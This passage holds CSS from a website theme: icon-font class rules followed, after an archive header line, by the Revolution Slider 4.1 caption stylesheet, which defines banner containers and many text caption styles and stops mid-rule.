.icon-arrow-up-right2:before {
    content: "\ee87";
}
.icon-arrow-right2:before {
    content: "\ee88";
}
.icon-arrow-down-right2:before {
    content: "\ee89";
}
.icon-arrow-down2:before {
    content: "\ee8a";
}
.icon-arrow-down-left2:before {
    content: "\ee8b";
}
.icon-arrow-left2:before {
    content: "\ee8c";
}
.icon-circle-up:before {
    content: "\ee8d";
}
.icon-circle-right:before {
    content: "\ee8e";
}
.icon-circle-down:before {
    content: "\ee8f";
}
.icon-circle-left:before {
    content: "\ee90";
}
.icon-tab:before {
    content: "\ee91";
}
.icon-move-up:before {
    content: "\ee92";
}
.icon-move-down:before {
    content: "\ee93";
}
.icon-sort-alpha-asc:before {
    content: "\ee94";
}
.icon-sort-alpha-desc:before {
    content: "\ee95";
}
.icon-sort-numeric-asc:before {
    content: "\ee96";
}
.icon-sort-numberic-desc:before {
    content: "\ee97";
}
.icon-sort-amount-asc:before {
    content: "\ee98";
}
.icon-sort-amount-desc:before {
    content: "\ee99";
}
.icon-command:before {
    content: "\ee9a";
}
.icon-shift:before {
    content: "\ee9b";
}
.icon-ctrl:before {
    content: "\ee9c";
}
.icon-opt:before {
    content: "\ee9d";
}
.icon-checkbox-checked:before {
    content: "\ee9e";
}
.icon-checkbox-unchecked:before {
    content: "\ee9f";
}
.icon-radio-checked:before {
    content: "\eea0";
}
.icon-radio-checked2:before {
    content: "\eea1";
}
.icon-radio-unchecked:before {
    content: "\eea2";
}
.icon-crop:before {
    content: "\eea3";
}
.icon-make-group:before {
    content: "\eea4";
}
.icon-ungroup:before {
    content: "\eea5";
}
.icon-scissors:before {
    content: "\eea6";
}
.icon-filter:before {
    content: "\eea7";
}
.icon-font:before {
    content: "\eea8";
}
.icon-ligature:before {
    content: "\eea9";
}
.icon-ligature2:before {
    content: "\eeaa";
}
.icon-text-height:before {
    content: "\eeab";
}
.icon-text-width:before {
    content: "\eeac";
}
.icon-font-size:before {
    content: "\eead";
}
.icon-bold:before {
    content: "\eeae";
}
.icon-underline:before {
    content: "\eeaf";
}
.icon-italic:before {
    content: "\eeb0";
}
.icon-strikethrough:before {
    content: "\eeb1";
}
.icon-omega:before {
    content: "\eeb2";
}
.icon-sigma:before {
    content: "\eeb3";
}
.icon-page-break:before {
    content: "\eeb4";
}
.icon-superscript:before {
    content: "\eeb5";
}
.icon-subscript:before {
    content: "\eeb6";
}
.icon-superscript2:before {
    content: "\eeb7";
}
.icon-subscript2:before {
    content: "\eeb8";
}
.icon-text-color:before {
    content: "\eeb9";
}
.icon-pagebreak:before {
    content: "\eeba";
}
.icon-clear-formatting:before {
    content: "\eebb";
}
.icon-table:before {
    content: "\eebc";
}
.icon-table2:before {
    content: "\eebd";
}
.icon-insert-template:before {
    content: "\eebe";
}
.icon-pilcrow:before {
    content: "\eebf";
}
.icon-ltr:before {
    content: "\eec0";
}
.icon-rtl:before {
    content: "\eec1";
}
.icon-section:before {
    content: "\eec2";
}
.icon-paragraph-left:before {
    content: "\eec3";
}
.icon-paragraph-center:before {
    content: "\eec4";
}
.icon-paragraph-right:before {
    content: "\eec5";
}
.icon-paragraph-justify:before {
    content: "\eec6";
}
.icon-indent-increase:before {
    content: "\eec7";
}
.icon-indent-decrease:before {
    content: "\eec8";
}
.icon-share:before {
    content: "\eec9";
}
.icon-new-tab:before {
    content: "\eeca";
}
.icon-embed:before {
    content: "\eecb";
}
.icon-embed2:before {
    content: "\eecc";
}
.icon-terminal:before {
    content: "\eecd";
}
.icon-share2:before {
    content: "\eece";
}
.icon-mail:before {
    content: "\eecf";
}
.icon-mail2:before {
    content: "\eed0";
}
.icon-mail3:before {
    content: "\eed1";
}
.icon-mail4:before {
    content: "\eed2";
}
.icon-amazon:before {
    content: "\eed3";
}
.icon-google:before {
    content: "\eed4";
}
.icon-google2:before {
    content: "\eed5";
}
.icon-google3:before {
    content: "\eed6";
}
.icon-google-plus:before {
    content: "\eed7";
}
.icon-google-plus2:before {
    content: "\eed8";
}
.icon-google-plus3:before {
    content: "\eed9";
}
.icon-hangouts:before {
    content: "\eeda";
}
.icon-google-drive:before {
    content: "\eedb";
}
.icon-facebook:before {
    content: "\eedc";
}
.icon-facebook2:before {
    content: "\eedd";
}
.icon-instagram:before {
    content: "\eede";
}
.icon-whatsapp:before {
    content: "\eedf";
}
.icon-spotify:before {
    content: "\eee0";
}
.icon-telegram:before {
    content: "\eee1";
}
.icon-twitter:before {
    content: "\eee2";
}
.icon-vine:before {
    content: "\eee3";
}
.icon-vk:before {
    content: "\eee4";
}
.icon-renren:before {
    content: "\eee5";
}
.icon-sina-weibo:before {
    content: "\eee6";
}
.icon-rss:before {
    content: "\eee7";
}
.icon-rss2:before {
    content: "\eee8";
}
.icon-youtube:before {
    content: "\eee9";
}
.icon-youtube2:before {
    content: "\eeea";
}
.icon-twitch:before {
    content: "\eeeb";
}
.icon-vimeo:before {
    content: "\eeec";
}
.icon-vimeo2:before {
    content: "\eeed";
}
.icon-lanyrd:before {
    content: "\eeee";
}
.icon-flickr:before {
    content: "\eeef";
}
.icon-flickr2:before {
    content: "\eef0";
}
.icon-flickr3:before {
    content: "\eef1";
}
.icon-flickr4:before {
    content: "\eef2";
}
.icon-dribbble:before {
    content: "\eef3";
}
.icon-behance:before {
    content: "\eef4";
}
.icon-behance2:before {
    content: "\eef5";
}
.icon-deviantart:before {
    content: "\eef6";
}
.icon-500px:before {
    content: "\eef7";
}
.icon-steam:before {
    content: "\eef8";
}
.icon-steam2:before {
    content: "\eef9";
}
.icon-dropbox:before {
    content: "\eefa";
}
.icon-onedrive:before {
    content: "\eefb";
}
.icon-github:before {
    content: "\eefc";
}
.icon-npm:before {
    content: "\eefd";
}
.icon-basecamp:before {
    content: "\eefe";
}
.icon-trello:before {
    content: "\eeff";
}
.icon-wordpress:before {
    content: "\ef00";
}
.icon-joomla:before {
    content: "\ef01";
}
.icon-ello:before {
    content: "\ef02";
}
.icon-blogger:before {
    content: "\ef03";
}
.icon-blogger2:before {
    content: "\ef04";
}
.icon-tumblr:before {
    content: "\ef05";
}
.icon-tumblr2:before {
    content: "\ef06";
}
.icon-yahoo:before {
    content: "\ef07";
}
.icon-yahoo2:before {
    content: "\ef08";
}
.icon-tux:before {
    content: "\ef09";
}
.icon-appleinc:before {
    content: "\ef0a";
}
.icon-finder:before {
    content: "\ef0b";
}
.icon-android:before {
    content: "\ef0c";
}
.icon-windows:before {
    content: "\ef0d";
}
.icon-windows8:before {
    content: "\ef0e";
}
.icon-soundcloud:before {
    content: "\ef0f";
}
.icon-soundcloud2:before {
    content: "\ef10";
}
.icon-skype:before {
    content: "\ef11";
}
.icon-reddit:before {
    content: "\ef12";
}
.icon-hackernews:before {
    content: "\ef13";
}
.icon-wikipedia:before {
    content: "\ef14";
}
.icon-linkedin:before {
    content: "\ef15";
}
.icon-linkedin2:before {
    content: "\ef16";
}
.icon-lastfm:before {
    content: "\ef17";
}
.icon-lastfm2:before {
    content: "\ef18";
}
.icon-delicious:before {
    content: "\ef19";
}
.icon-stumbleupon:before {
    content: "\ef1a";
}
.icon-stumbleupon2:before {
    content: "\ef1b";
}
.icon-stackoverflow:before {
    content: "\ef1c";
}
.icon-pinterest:before {
    content: "\ef1d";
}
.icon-pinterest2:before {
    content: "\ef1e";
}
.icon-xing:before {
    content: "\ef1f";
}
.icon-xing2:before {
    content: "\ef20";
}
.icon-flattr:before {
    content: "\ef21";
}
.icon-foursquare:before {
    content: "\ef22";
}
.icon-yelp:before {
    content: "\ef23";
}
.icon-paypal:before {
    content: "\ef24";
}
.icon-chrome:before {
    content: "\ef25";
}
.icon-firefox:before {
    content: "\ef26";
}
.icon-IE:before {
    content: "\ef27";
}
.icon-edge:before {
    content: "\ef28";
}
.icon-safari:before {
    content: "\ef29";
}
.icon-opera:before {
    content: "\ef2a";
}
.icon-file-pdf:before {
    content: "\ef2b";
}
.icon-file-openoffice:before {
    content: "\ef2c";
}
.icon-file-word:before {
    content: "\ef2d";
}
.icon-file-excel:before {
    content: "\ef2e";
}
.icon-libreoffice:before {
    content: "\ef2f";
}
.icon-html-five:before {
    content: "\ef30";
}
.icon-html-five2:before {
    content: "\ef31";
}
.icon-css3:before {
    content: "\ef32";
}
.icon-git:before {
    content: "\ef33";
}
.icon-codepen:before {
    content: "\ef34";
}
.icon-svg:before {
    content: "\ef35";
}
.icon-IcoMoon:before {
    content: "\ef36";
}

PK!�j**bizone/css/settings.cssnu&1i�/*-----------------------------------------------------------------------------

	-	Revolution Slider 4.1 Captions -

		Screen Stylesheet

version:   	1.4.5
date:      	27/11/13
author:		themepunch
email:     	info@themepunch.com
website:   	http://www.themepunch.com
-----------------------------------------------------------------------------*/

/*********************************************
	-	SETTINGS FOR BANNER CONTAINERS	-
**********************************************/

.tp-banner-container{
	width:100%;
	position:relative;
	padding:0;

}

.tp-banner{
	width:100%;
	position:relative;
}

.tp-banner-fullscreen-container {
		width:100%;
		position:relative;
		padding:0;
}



/*************************
	-	CAPTIONS	-
**************************/

.tp-static-layers	{	
	position:absolute; 
	z-index:505; 
	top:0px;left:
	0px;
}

.tp-hide-revslider,.tp-caption.tp-hidden-caption{	visibility:hidden !important; display:none !important}


.tp-caption { z-index:1; white-space:nowrap}
.tp-caption-demo .tp-caption	{	position:relative !important; display:inline-block; margin-bottom:10px; margin-right:20px !important}


.tp-caption.whitedivider3px {

	color: #000000;
	text-shadow: none;
	background-color: rgb(255, 255, 255);
	background-color: rgba(255, 255, 255, 1);
	text-decoration: none;
	min-width: 408px;
	min-height: 3px;
	background-position: initial initial;
	background-repeat: initial initial;
	border-width: 0px;
	border-color: #000000;
	border-style: none;
}


.tp-caption.finewide_large_white {
	color:#ffffff;
	text-shadow:none;
	font-size:60px;
	line-height:60px;
	font-weight:300;
	font-family:"Open Sans", sans-serif;
	background-color:transparent;
	text-decoration:none;
	text-transform:uppercase;
	letter-spacing:8px;
	border-width:0px;
	border-color:rgb(0, 0, 0);
	border-style:none;
}

.tp-caption.whitedivider3px {
	color:#000000;
	text-shadow:none;
	background-color:rgb(255, 255, 255);
	background-color:rgba(255, 255, 255, 1);
	text-decoration:none;
	font-size:0px;
	line-height:0;
	min-width:468px;
	min-height:3px;
	border-width:0px;
	border-color:rgb(0, 0, 0);
	border-style:none;
}

.tp-caption.finewide_medium_white {
	color:#ffffff;
	text-shadow:none;
	font-size:37px;
	line-height:37px;
	font-weight:300;
	font-family:"Open Sans", sans-serif;
	background-color:transparent;
	text-decoration:none;
	text-transform:uppercase;
	letter-spacing:5px;
	border-width:0px;
	border-color:rgb(0, 0, 0);
	border-style:none;
}

.tp-caption.boldwide_small_white {
	font-size:25px;
	line-height:25px;
	font-weight:800;
	font-family:"Open Sans", sans-serif;
	color:rgb(255, 255, 255);
	text-decoration:none;
	background-color:transparent;
	text-shadow:none;
	text-transform:uppercase;
	letter-spacing:5px;
	border-width:0px;
	border-color:rgb(0, 0, 0);
	border-style:none;
}

.tp-caption.whitedivider3px_vertical {
	color:#000000;
	text-shadow:none;
	background-color:rgb(255, 255, 255);
	background-color:rgba(255, 255, 255, 1);
	text-decoration:none;
	font-size:0px;
	line-height:0;
	min-width:3px;
	min-height:130px;
	border-width:0px;
	border-color:rgb(0, 0, 0);
	border-style:none;
}

.tp-caption.finewide_small_white {
	color:#ffffff;
	text-shadow:none;
	font-size:25px;
	line-height:25px;
	font-weight:300;
	font-family:"Open Sans", sans-serif;
	background-color:transparent;
	text-decoration:none;
	text-transform:uppercase;
	letter-spacing:5px;
	border-width:0px;
	border-color:rgb(0, 0, 0);
	border-style:none;
}

.tp-caption.finewide_verysmall_white_mw {
	font-size:13px;
	line-height:25px;
	font-weight:400;
	font-family:"Open Sans", sans-serif;
	color:#ffffff;
	text-decoration:none;
	background-color:transparent;
	text-shadow:none;
	text-transform:uppercase;
	letter-spacing:5px;
	max-width:470px;
	white-space:normal !important;
	border-width:0px;
	border-color:rgb(0, 0, 0);
	border-style:none;
}

.tp-caption.lightgrey_divider {
	text-decoration:none;
	background-color:rgb(235, 235, 235);
	background-color:rgba(235, 235, 235, 1);
	width:370px;
	height:3px;
	background-position:initial initial;
	background-repeat:initial initial;
	border-width:0px;
	border-color:rgb(34, 34, 34);
	border-style:none;
}

.tp-caption.finewide_large_white {
	color: #FFF;
	text-shadow: none;
	font-size: 60px;
	line-height: 60px;
	font-weight: 300;
	font-family: "Open Sans", sans-serif;
	background-color: rgba(0, 0, 0, 0);
	text-decoration: none;
	text-transform: uppercase;
	letter-spacing: 8px;
	border-width: 0px;
	border-color: #000;
	border-style: none;
}

.tp-caption.finewide_medium_white {
	color: #FFF;
	text-shadow: none;
	font-size: 34px;
	line-height: 34px;
	font-weight: 300;
	font-family: "Open Sans", sans-serif;
	background-color: rgba(0, 0, 0, 0);
	text-decoration: none;
	text-transform: uppercase;
	letter-spacing: 5px;
	border-width: 0px;
	border-color: #000;
	border-style: none;
}

.tp-caption.huge_red {
	position:absolute;
	color:rgb(223,75,107);
	font-weight:400;
	font-size:150px;
	line-height:130px;
	font-family: 'Oswald', sans-serif;
	margin:0px;
	border-width:0px;
	border-style:none;
	white-space:nowrap;
	background-color:rgb(45,49,54);
	padding:0px;
}

.tp-caption.middle_yellow {
	position:absolute;
	color:rgb(251,213,114);
	font-weight:600;
	font-size:50px;
	line-height:50px;
	font-family: 'Open Sans', sans-serif;
	margin:0px;
	border-width:0px;
	border-style:none;
	white-space:nowrap;
}

.tp-caption.huge_thin_yellow {
	position:absolute;
	color:rgb(251,213,114);
	font-weight:300;
	font-size:90px;
	line-height:90px;
	font-family: 'Open Sans', sans-serif;
	margin:0px;
	letter-spacing: 20px;
	border-width:0px;
	border-style:none;
	white-space:nowrap;
}

.tp-caption.big_dark {
	position:absolute;
	color:#333;
	font-weight:700;
	font-size:70px;
	line-height:70px;
	font-family:"Open Sans";
	margin:0px;
	border-width:0px;
	border-style:none;
	white-space:nowrap;
}

.tp-caption.medium_dark {
	position:absolute;
	color:#333;
	font-weight:300;
	font-size:40px;
	line-height:40px;
	font-family:"Open Sans";
	margin:0px;
	letter-spacing: 5px;
	border-width:0px;
	border-style:none;
	white-space:nowrap;
}


.tp-caption.medium_grey {
	position:absolute;
	color:#fff;
	text-shadow:0px 2px 5px rgba(0, 0, 0, 0.5);
	font-weight:700;
	font-size:20px;
	line-height:20px;
	font-family:Arial;
	padding:2px 4px;
	margin:0px;
	border-width:0px;
	border-style:none;
	background-color:#888;
	white-space:nowrap;
}

.tp-caption.small_text {
	position:absolute;
	color:#fff;
	text-shadow:0px 2px 5px rgba(0, 0, 0, 0.5);
	font-weight:700;
	font-size:14px;
	line-height:20px;
	font-family:Arial;
	margin:0px;
	border-width:0px;
	border-style:none;
	white-space:nowrap;
}

.tp-caption.medium_text {
	position:absolute;
	color:#fff;
	text-shadow:0px 2px 5px rgba(0, 0, 0, 0.5);
	font-weight:700;
	font-size:20px;
	line-height:20px;
	font-family:Arial;
	margin:0px;
	border-width:0px;
	border-style:none;
	white-space:nowrap;
}


.tp-caption.large_bold_white_25 {
	font-size:55px;
	line-height:65px;
	font-weight:700;
	font-family:"Open Sans";
	color:#fff;
	text-decoration:none;
	background-color:transparent;
	text-align:center;
	text-shadow:#000 0px 5px 10px;
	border-width:0px;
	border-color:rgb(255, 255, 255);
	border-style:none;
}

.tp-caption.medium_text_shadow {
	font-size:25px;
	line-height:25px;
	font-weight:600;
	font-family:"Open Sans";
	color:#fff;
	text-decoration:none;
	background-color:transparent;
	text-align:center;
	text-shadow:#000 0px 5px 10px;
	border-width:0px;
	border-color:rgb(255, 255, 255);
	border-style:none;
}

.tp-caption.large_text {
	position:absolute;
	color:#fff;
	text-shadow:0px 2px 5px rgba(0, 0, 0, 0.5);
	font-weight:700;
	font-size:40px;
	line-height:40px;
	font-family:Arial;
	margin:0px;
	border-width:0px;
	border-style:none;
	white-space:nowrap;
}

.tp-caption.medium_bold_grey {
	font-size:30px;
	line-height:30px;
	font-weight:800;
	font-family:"Open Sans";
	color:rgb(102, 102, 102);
	text-decoration:none;
	background-color:transparent;
	text-shadow:none;
	margin:0px;
	padding:1px 4px 0px;
	border-width:0px;
	border-color:rgb(255, 214, 88);
	border-style:none;
}

.tp-caption.very_large_text {
	position:absolute;
	color:#fff;
	text-shadow:0px 2px 5px rgba(0, 0, 0, 0.5);
	font-weight:700;
	font-size:60px;
	line-height:60px;
	font-family:Arial;
	margin:0px;
	border-width:0px;
	border-style:none;
	white-space:nowrap;
	letter-spacing:-2px;
}

.tp-caption.very_big_white {
	position:absolute;
	color:#fff;
	text-shadow:none;
	font-weight:800;
	font-size:60px;
	line-height:60px;
	font-family:Arial;
	margin:0px;
	border-width:0px;
	border-style:none;
	white-space:nowrap;
	padding:0px 4px;
	padding-top:1px;
	background-color:#000;
}

.tp-caption.very_big_black {
	position:absolute;
	color:#000;
	text-shadow:none;
	font-weight:700;
	font-size:60px;
	line-height:60px;
	font-family:Arial;
	margin:0px;
	border-width:0px;
	border-style:none;
	white-space:nowrap;
	padding:0px 4px;
	padding-top:1px;
	background-color:#fff;
}

.tp-caption.modern_medium_fat {
	position:absolute;
	color:#000;
	text-shadow:none;
	font-weight:800;
	font-size:24px;
	line-height:20px;
	font-family:"Open Sans", sans-serif;
	margin:0px;
	border-width:0px;
	border-style:none;
	white-space:nowrap;
}

.tp-caption.modern_medium_fat_white {
	position:absolute;
	color:#fff;
	text-shadow:none;
	font-weight:800;
	font-size:24px;
	line-height:20px;
	font-family:"Open Sans", sans-serif;
	margin:0px;
	border-width:0px;
	border-style:none;
	white-space:nowrap;
}

.tp-caption.modern_medium_light {
	position:absolute;
	color:#000;
	text-shadow:none;
	font-weight:300;
	font-size:24px;
	line-height:20px;
	font-family:"Open Sans", sans-serif;
	margin:0px;
	border-width:0px;
	border-style:none;
	white-space:nowrap;
}

.tp-caption.modern_big_bluebg {
	position:absolute;
	color:#fff;
	text-shadow:none;
	font-weight:800;
	font-size:30px;
	line-height:36px;
	font-family:"Open Sans", sans-serif;
	padding:3px 10px;
	margin:0px;
	border-width:0px;
	border-style:none;
	background-color:#4e5b6c;
	letter-spacing:0;
}

.tp-caption.modern_big_redbg {
	position:absolute;
	color:#fff;
	text-shadow:none;
	font-weight:300;
	font-size:30px;
	line-height:36px;
	font-family:"Open Sans", sans-serif;
	padding:3px 10px;
	padding-top:1px;
	margin:0px;
	border-width:0px;
	border-style:none;
	background-color:#de543e;
	letter-spacing:0;
}

.tp-caption.modern_small_text_dark {
	position:absolute;
	color:#555;
	text-shadow:none;
	font-size:14px;
	line-height:22px;
	font-family:Arial;
	margin:0px;
	border-width:0px;
	border-style:none;
	white-space:nowrap;
}

.tp-caption.boxshadow {
	-moz-box-shadow:0px 0px 20px rgba(0, 0, 0, 0.5);
	-webkit-box-shadow:0px 0px 20px rgba(0, 0, 0, 0.5);
	box-shadow:0px 0px 20px rgba(0, 0, 0, 0.5);
}

.tp-caption.black {
	color:#000;
	text-shadow:none;
}

.tp-caption.noshadow {
	text-shadow:none;
}
/*.tp-caption a {
	-webkit-transition:all 0.2s ease-out;
	-moz-transition:all 0.2s ease-out;
	-o-transition:all 0.2s ease-out;
	-ms-transition:all 0.2s ease-out;
}

.tp-caption a:hover{
}*/

.tp-caption.thinheadline_dark {
	position:absolute;
	color:rgba(0,0,0,0.85);
	text-shadow:none;
	font-weight:300;
	font-size:30px;
	line-height:30px;
	font-family:"Open Sans";
	background-color:transparent;
}

.tp-caption.thintext_dark {
	position:absolute;
	color:rgba(0,0,0,0.85);
	text-shadow:none;
	font-weight:300;
	font-size:16px;
	line-height:26px;
	font-family:"Open Sans";
	background-color:transparent;
}

.tp-caption.medium_bg_red a {
	color: #fff;
    text-decoration: none;
}

.tp-caption.medium_bg_red a:hover {
	color: #fff;
    text-decoration: underline;
}

.tp-caption.smoothcircle {
	font-size:30px;
	line-height:75px;
	font-weight:800;
	font-family:"Open Sans";
	color:rgb(255, 255, 255);
	text-decoration:none;
	background-color:rgb(0, 0, 0);
	background-color:rgba(0, 0, 0, 0.498039);
	padding:50px 25px;
	text-align:center;
	border-radius:500px 500px 500px 500px;
	border-width:0px;
	border-color:rgb(0, 0, 0);
	border-style:none;
}

.tp-caption.largeblackbg {
	font-size:50px;
	line-height:70px;
	font-weight:300;
	font-family:"Open Sans";
	color:rgb(255, 255, 255);
	text-decoration:none;
	background-color:rgb(0, 0, 0);
	padding:0px 20px 5px;
	text-shadow:none;
	border-width:0px;
	border-color:rgb(255, 255, 255);
	border-style:none;
}

.tp-caption.largepinkbg {
	position:absolute;
	color:#fff;
	text-shadow:none;
	font-weight:300;
	font-size:50px;
	line-height:70px;
	font-family:"Open Sans";
	background-color:#db4360;
	padding:0px 20px;
	-webkit-border-radius:0px;
	-moz-border-radius:0px;
	border-radius:0px;
}

.tp-caption.largewhitebg {
	position:absolute;
	color:#000;
	text-shadow:none;
	font-weight:300;
	font-size:50px;
	line-height:70px;
	font-family:"Open Sans";
	background-color:#fff;
	padding:0px 20px;
	-webkit-border-radius:0px;
	-moz-border-radius:0px;
	border-radius:0px;
}

.tp-caption.largegreenbg {
	position:absolute;
	color:#fff;
	text-shadow:none;
	font-weight:300;
	font-size:50px;
	line-height:70px;
	font-family:"Open Sans";
	background-color:#67ae73;
	padding:0px 20px;
	-webkit-border-radius:0px;
	-moz-border-radius:0px;
	border-radius:0px;
}

.tp-caption.excerpt {
	font-size:36px;
	line-height:36px;
	font-weight:700;
	font-family:Arial;
	color:#ffffff;
	text-decoration:none;
	background-color:rgba(0, 0, 0, 1);
	text-shadow:none;
	margin:0px;
	letter-spacing:-1.5px;
	padding:1px 4px 0px 4px;
	width:150px;
	white-space:normal !important;
	height:auto;
	border-width:0px;
	border-color:rgb(255, 255, 255);
	border-style:none;
}

.tp-caption.large_bold_grey {
	font-size:60px;
	line-height:60px;
	font-weight:800;
	font-family:"Open Sans";
	color:rgb(102, 102, 102);
	text-decoration:none;
	background-color:transparent;
	text-shadow:none;
	margin:0px;
	padding:1px 4px 0px;
	border-width:0px;
	border-color:rgb(255, 214, 88);
	border-style:none;
}

.tp-caption.medium_thin_grey {
	font-size:34px;
	line-height:30px;
	font-weight:300;
	font-family:"Open Sans";
	color:rgb(102, 102, 102);
	text-decoration:none;
	background-color:transparent;
	padding:1px 4px 0px;
	text-shadow:none;
	margin:0px;
	border-width:0px;
	border-color:rgb(255, 214, 88);
	border-style:none;
}

.tp-caption.small_thin_grey {
	font-size:18px;
	line-height:26px;
	font-weight:300;
	font-family:"Open Sans";
	color:rgb(117, 117, 117);
	text-decoration:none;
	background-color:transparent;
	padding:1px 4px 0px;
	text-shadow:none;
	margin:0px;
	border-width:0px;
	border-color:rgb(255, 214, 88);
	border-style:none;
}

.tp-caption.lightgrey_divider {
	text-decoration:none;
	background-color:rgba(235, 235, 235, 1);
	width:370px;
	height:3px;
	background-position:initial initial;
	background-repeat:initial initial;
	border-width:0px;
	border-color:rgb(34, 34, 34);
	border-style:none;
}

.tp-caption.large_bold_darkblue {
	font-size:58px;
	line-height:60px;
	font-weight:800;
	font-family:"Open Sans";
	color:rgb(52, 73, 94);
	text-decoration:none;
	background-color:transparent;
	border-width:0px;
	border-color:rgb(255, 214, 88);
	border-style:none;
}

.tp-caption.medium_bg_darkblue {
	font-size:20px;
	line-height:20px;
	font-weight:800;
	font-family:"Open Sans";
	color:rgb(255, 255, 255);
	text-decoration:none;
	background-color:rgb(52, 73, 94);
	padding:10px;
	border-width:0px;
	border-color:rgb(255, 214, 88);
	border-style:none;
}

.tp-caption.medium_bold_red {
	font-size:24px;
	line-height:30px;
	font-weight:800;
	font-family:"Open Sans";
	color:rgb(227, 58, 12);
	text-decoration:none;
	background-color:transparent;
	padding:0px;
	border-width:0px;
	border-color:rgb(255, 214, 88);
	border-style:none;
}

.tp-caption.medium_light_red {
	font-size:21px;
	line-height:26px;
	font-weight:300;
	font-family:"Open Sans";
	color:rgb(227, 58, 12);
	text-decoration:none;
	background-color:transparent;
	padding:0px;
	border-width:0px;
	border-color:rgb(255, 214, 88);
	border-style:none;
}

.tp-caption.medium_bg_red {
	font-size:20px;
	line-height:20px;
	font-weight:800;
	font-family:"Open Sans";
	color:rgb(255, 255, 255);
	text-decoration:none;
	background-color:rgb(227, 58, 12);
	padding:10px;
	border-width:0px;
	border-color:rgb(255, 214, 88);
	border-style:none;
}

.tp-caption.medium_bold_orange {
	font-size:24px;
	line-height:30px;
	font-weight:800;
	font-family:"Open Sans";
	color:rgb(243, 156, 18);
	text-decoration:none;
	background-color:transparent;
	border-width:0px;
	border-color:rgb(255, 214, 88);
	border-style:none;
}

.tp-caption.medium_bg_orange {
	font-size:20px;
	line-height:20px;
	font-weight:800;
	font-family:"Open Sans";
	color:rgb(255, 255, 255);
	text-decoration:none;
	background-color:rgb(243, 156, 18);
	padding:10px;
	border-width:0px;
	border-color:rgb(255, 214, 88);
	border-style:none;
}

.tp-caption.grassfloor {
	text-decoration:none;
	background-color:rgba(160, 179, 151, 1);
	width:4000px;
	height:150px;
	border-width:0px;
	border-color:rgb(34, 34, 34);
	border-style:none;
}

.tp-caption.large_bold_white {
	font-size:58px;
	line-height:60px;
	font-weight:800;
	font-family:"Open Sans";
	color:rgb(255, 255, 255);
	text-decoration:none;
	background-color:transparent;
	border-width:0px;
	border-color:rgb(255, 214, 88);
	border-style:none;
}

.tp-caption.medium_light_white {
	font-size:30px;
	line-height:36px;
	font-weight:300;
	font-family:"Open Sans";
	color:rgb(255, 255, 255);
	text-decoration:none;
	background-color:transparent;
	padding:0px;
	border-width:0px;
	border-color:rgb(255, 214, 88);
	border-style:none;
}

.tp-caption.mediumlarge_light_white {
	font-size:34px;
	line-height:40px;
	font-weight:300;
	font-family:"Open Sans";
	color:rgb(255, 255, 255);
	text-decoration:none;
	background-color:transparent;
	padding:0px;
	border-width:0px;
	border-color:rgb(255, 214, 88);
	border-style:none;
}

.tp-caption.mediumlarge_light_white_center {
	font-size:34px;
	line-height:40px;
	font-weight:300;
	font-family:"Open Sans";
	color:#ffffff;
	text-decoration:none;
	background-color:transparent;
	padding:0px 0px 0px 0px;
	text-align:center;
	border-width:0px;
	border-color:rgb(255, 214, 88);
	border-style:none;
}

.tp-caption.medium_bg_asbestos {
	font-size:20px;
	line-height:20px;
	font-weight:800;
	font-family:"Open Sans";
	color:rgb(255, 255, 255);
	text-decoration:none;
	background-color:rgb(127, 140, 141);
	padding:10px;
	border-width:0px;
	border-color:rgb(255, 214, 88);
	border-style:none;
}

.tp-caption.medium_light_black {
font-size:30px;
line-height:36px;
font-weight:300;
font-family:"Open Sans";
color:rgb(0, 0, 0);
text-decoration:none;
background-color:transparent;
padding:0px;
border-width:0px;
border-color:rgb(255, 214, 88);
border-style:none;
}

.tp-caption.large_bold_black {
font-size:58px;
line-height:60px;
font-weight:800;
font-family:"Open Sans";
color:rgb(0, 0, 0);
text-decoration:none;
background-color:transparent;
border-width:0px;
border-color:rgb(255, 214, 88);
border-style:none;
}

.tp-caption.mediumlarge_light_darkblue {
font-size:34px;
line-height:40px;
font-weight:300;
font-family:"Open Sans";
color:rgb(52, 73, 94);
text-decoration:none;
background-color:transparent;
padding:0px;
border-width:0px;
border-color:rgb(255, 214, 88);
border-style:none;
}

.tp-caption.small_light_white {
font-size:17px;
line-height:28px;
font-weight:300;
font-family:"Open Sans";
color:rgb(255, 255, 255);
text-decoration:none;
background-color:transparent;
padding:0px;
border-width:0px;
border-color:rgb(255, 214, 88);
border-style:none;
}

.tp-caption.roundedimage {
border-width:0px;
border-color:rgb(34, 34, 34);
border-style:none;
}

.tp-caption.large_bg_black {
font-size:40px;
line-height:40px;
font-weight:800;
font-family:"Open Sans";
color:rgb(255, 255, 255);
text-decoration:none;
background-color:rgb(0, 0, 0);
padding:10px 20px 15px;
border-width:0px;
border-color:rgb(255, 214, 88);
border-style:none;
}

.tp-caption.mediumwhitebg {
font-size:30px;
line-height:30px;
font-weight:300;
font-family:"Open Sans";
color:rgb(0, 0, 0);
text-decoration:none;
background-color:rgb(255, 255, 255);
padding:5px 15px 10px;
text-shadow:none;
border-width:0px;
border-color:rgb(0, 0, 0);
border-style:none;
}

.tp-caption.medium_bg_orange_new1 {
font-size:20px;
line-height:20px;
font-weight:800;
font-family:"Open Sans";
color:rgb(255, 255, 255);
text-decoration:none;
background-color:rgb(243, 156, 18);
padding:10px;
border-width:0px;
border-color:rgb(255, 214, 88);
border-style:none;
}



.tp-caption.boxshadow{
		-moz-box-shadow: 0px 0px 20px rgba(0, 0, 0, 0.5);
		-webkit-box-shadow: 0px 0px 20px rgba(0, 0, 0, 0.5);
		box-shadow: 0px 0px 20px rgba(0, 0, 0, 0.5);
	}

.tp-caption.black{
		color: #000;
		text-shadow: none;
		font-weight: 300;
		font-size: 19px;
		line-height: 19px;
		font-family: 'Open Sans', sans;
	}

.tp-caption.noshadow {
		text-shadow: none;
	}


.tp_inner_padding	{	box-sizing:border-box;
						-webkit-box-sizing:border-box;
						-moz-box-sizing:border-box;
						max-height:none !important;	}


/*.tp-caption			{	transform:none !important}*/


/*********************************
	-	SPECIAL TP CAPTIONS -
**********************************/
.tp-caption .frontcorner		{
										width: 0;
										height: 0;
										border-left: 40px solid transparent;
										border-right: 0px solid transparent;
										border-top: 40px solid #00A8FF;
										position: absolute;left:-40px;top:0px;
									}

.tp-caption .backcorner		{
										width: 0;
										height: 0;
										border-left: 0px solid transparent;
										border-right: 40px solid transparent;
										border-bottom: 40px solid #00A8FF;
										position: absolute;right:0px;top:0px;
									}

.tp-caption .frontcornertop		{
										width: 0;
										height: 0;
										border-left: 40px solid transparent;
										border-right: 0px solid transparent;
										border-bottom: 40px solid #00A8FF;
										position: absolute;left:-40px;top:0px;
									}

.tp-caption .backcornertop		{
										width: 0;
										height: 0;
